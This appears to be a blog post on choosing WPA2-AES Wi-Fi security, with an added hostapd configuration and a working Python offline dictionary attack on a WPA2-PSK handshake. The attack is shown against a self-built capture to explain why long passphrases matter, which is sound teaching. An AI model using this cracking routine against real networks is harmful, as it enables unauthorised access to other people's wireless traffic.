It's not the flaws themselves that make WPA2-AES the best option, but the fact that they are cracks in the dam. Who knows what will turn up next? As of this writing there are no known flaws in WPA2-AES (AES-CCMP), which was developed last and built on, and improved, the work in the earlier security protocols.

Problems Getting to WPA2

Everyone who can should opt for WPA2-AES, but there may be roadblocks.

WPA2-AES requires more computational horsepower than WPA-TKIP. TKIP was deliberately designed to run on the RC4 hardware that WEP used; AES-CCMP needs a wireless chipset that can do AES, and older routers do not have one. If your router does not offer WPA2, you can check for a firmware update, but firmware cannot add hardware the chipset lacks, so most likely you'll have to buy a new router to get the best security.

Then too, since it is the latest and greatest, WPA2-AES may not be supported on the computer, smartphone, gaming machine, Internet radio or whatever other device you want to use with your wireless network.

For example, Windows XP SP2 does not support WPA2, even if it has been kept up to date on patches. A "hotfix" (KB893357) needs to be installed to add WPA2 support to Windows XP SP2. Windows XP SP3 includes that update.

A WPA2 router may offer both TKIP and AES simultaneously (often labeled "WPA/WPA2 mixed" or "TKIP+AES"). Start with AES only and hope for the best. Only choose the mixed option if you have to, to support an older device, and understand the cost: in mixed mode any device can still negotiate TKIP, and the group key that protects broadcast and multicast traffic has to use a cipher every client supports, so it falls back to TKIP for everyone on the network.
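Here is what those two choices look like in configuration form. This is an added example using hostapd, the open-source access point software, rather than any particular consumer router's menus; the interface name, SSID and passphrase are placeholders, not values from the original post.

```ini
# Added example: hostapd.conf fragments, not from the original post.
# The interface, ssid and wpa_passphrase values are made-up placeholders.

# --- Recommended: WPA2 only, AES-CCMP only ---
interface=wlan0
ssid=ExampleNet-Not-Real
hw_mode=g
channel=6
# wpa=2 means RSN (WPA2) only; WPA1/TKIP-only clients cannot associate.
wpa=2
# Personal (pre-shared key) flavor.
wpa_key_mgmt=WPA-PSK
# AES-CCMP is the only pairwise cipher offered, so it is also the group cipher.
rsn_pairwise=CCMP
wpa_passphrase=placeholder-change-me-to-a-long-pass-sentence

# --- Fallback for one old device: WPA/WPA2 mixed, TKIP+AES ---
# Uncomment these instead of the three wpa lines above.
# wpa=3 accepts both WPA (TKIP) and WPA2 (RSN) clients.
#wpa=3
#wpa_key_mgmt=WPA-PSK
# Cipher offered to WPA1 clients.
#wpa_pairwise=TKIP
# WPA2 clients may pick either; a client that prefers TKIP still gets it.
#rsn_pairwise=CCMP TKIP
# With TKIP enabled anywhere, hostapd uses TKIP as the group cipher for
# broadcast/multicast traffic, because every client must be able to decrypt it.
```

The first fragment is the "AES only" setting; the commented-out second fragment is the mixed mode, shown so the difference is explicit: the moment TKIP appears in either pairwise list, the group traffic for all clients, including the AES-capable ones, is protected only by TKIP.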

The AES-CCMP security protocol was a long time coming. Rather than wait for the IEEE 802.11i standard to be finalized, some hardware manufacturers added early versions of the protocol to WPA routers. Since these were based on draft, rather than final, versions of the protocol, they may or may not interoperate with newer hardware and software.

Still, if replacing an old WPA router is a big deal, I suppose it's worth a try.

Two Other Aspects of Security

WPA and WPA2 both come in two flavors, Personal and Enterprise. In the Personal version everyone shares a single password; in the Enterprise version each user of the wireless network gets their own credentials (a username and password, or a certificate), which the router checks against an authentication server using 802.1X. The Personal version is also known as Pre-Shared Key, or PSK for short.

So, technically, the best security for consumers and small businesses is WPA2-PSK-AES-CCMP.

However, this entire alphabet soup falls down if you choose a poor password.

The password itself never travels over the air, but the handshake that happens every time a device joins the network does, and a bad guy can capture and save it. With that handshake in hand he can check guesses against it offline, thousands of guesses a second for days on end, with nothing on your network to notice, slow down or lock out the attempts.

Perhaps no one will attack the network you connect to this way, but if they do, the only defense is a long, reasonably random password. WPA and WPA2 passwords must be at least 8 characters and can be up to 63 characters long. The password is also mixed with the network name (SSID) when the key is derived, so a network with a common default name lets an attacker reuse guesses precomputed for that name; give the network a unique name as well. Better yet, think "pass sentence" rather than password. For more on this see my blog, What no one is saying about WPA2 security.
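To make the offline attack in the two paragraphs above concrete, here is an added example, my code rather than anything from the original post, that walks through what the bad guy does. The "capture" is constructed inside the script, not taken from real traffic: it picks a weak passphrase, derives the keys the way the access point and client do, builds the second message of the four-way handshake, and then recovers the passphrase from nothing but the handshake fields that were sent in the clear. The SSID, MAC addresses, nonces and word list are all made up; the key derivation steps themselves (PBKDF2 to the PMK, the 802.11i PRF to the PTK, HMAC-SHA1 for the EAPOL-Key MIC) are the standard ones.

```python
"""Offline dictionary attack against a WPA2-PSK four-way handshake.

Added example, not from the original post. The "capture" is constructed
below, not real traffic: the SSID, MAC addresses, nonces and word list
are made up. Key derivation follows IEEE 802.11i (PBKDF2 -> PMK,
PRF -> PTK, HMAC-SHA1 -> EAPOL-Key MIC).
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
    # Those 4096 iterations are the only work an attacker does per guess.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ...
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    # PTK for CCMP is 48 bytes: KCK (16) || KEK (16) || TK (16).
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # WPA2/AES-CCMP (key descriptor version 2): MIC = HMAC-SHA1 over the whole
    # EAPOL-Key frame with its MIC field zeroed, truncated to 16 bytes.
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields before Key MIC
MIC_LEN = 16


def build_msg2(snonce: bytes, replay_counter: int) -> bytes:
    # Minimal EAPOL-Key message 2 (client -> AP) with the MIC field zeroed.
    # The field layout is the real one; the values are illustrative.
    body = bytes([0x02])                    # descriptor type: RSN (WPA2)
    body += (0x010A).to_bytes(2, "big")     # key info: version 2, pairwise, MIC present
    body += (0).to_bytes(2, "big")          # key length
    body += replay_counter.to_bytes(8, "big")
    body += snonce                          # key nonce: the client's SNonce
    body += bytes(16)                       # key IV
    body += bytes(8)                        # key RSC
    body += bytes(8)                        # key ID (reserved)
    body += bytes(MIC_LEN)                  # key MIC, zero while the MIC is computed
    body += (0).to_bytes(2, "big")          # key data length (no RSN IE in this toy frame)
    return bytes([0x02, 0x03]) + len(body).to_bytes(2, "big") + body


def crack(ssid, ap_mac, sta_mac, anonce, snonce, eapol_zeroed, captured_mic, wordlist):
    # The attacker's loop. Every input was sent in the clear, so this runs entirely offline.
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return guess
    return None


# Constructed capture (made-up values, not real traffic).
SSID = "linksys"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "password1"   # the weak secret the "network owner" chose


def make_capture() -> bytes:
    # What the client actually transmits: message 2 with a valid MIC filled in.
    zeroed = build_msg2(SNONCE, 1)
    pmk = pmk_from_passphrase(TRUE_PASSPHRASE, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, zeroed)
    return zeroed[:MIC_OFFSET] + mic + zeroed[MIC_OFFSET + MIC_LEN:]


def extract(on_air: bytes):
    # Attacker side: pull the MIC out of the sniffed frame and zero the field again.
    mic = on_air[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    zeroed = on_air[:MIC_OFFSET] + bytes(MIC_LEN) + on_air[MIC_OFFSET + MIC_LEN:]
    return zeroed, mic


def demo(wordlist):
    zeroed, mic = extract(make_capture())
    return crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, zeroed, mic, wordlist)


if __name__ == "__main__":
    print(demo(["123456", "letmein", "password1", "qwerty"]))
```

Everything `crack` consumes is public: the network name, the two MAC addresses, the two nonces and the MIC-protected EAPOL frame. The only thing slowing each guess is the 4,096 PBKDF2 iterations, and a graphics card gets through far more than thousands of those per second, so the length and randomness of the passphrase is the whole defense. The SSID's role as the PBKDF2 salt is also visible here: the same passphrase on a differently named network yields a different PMK, which is why precomputed tables only help against common default names.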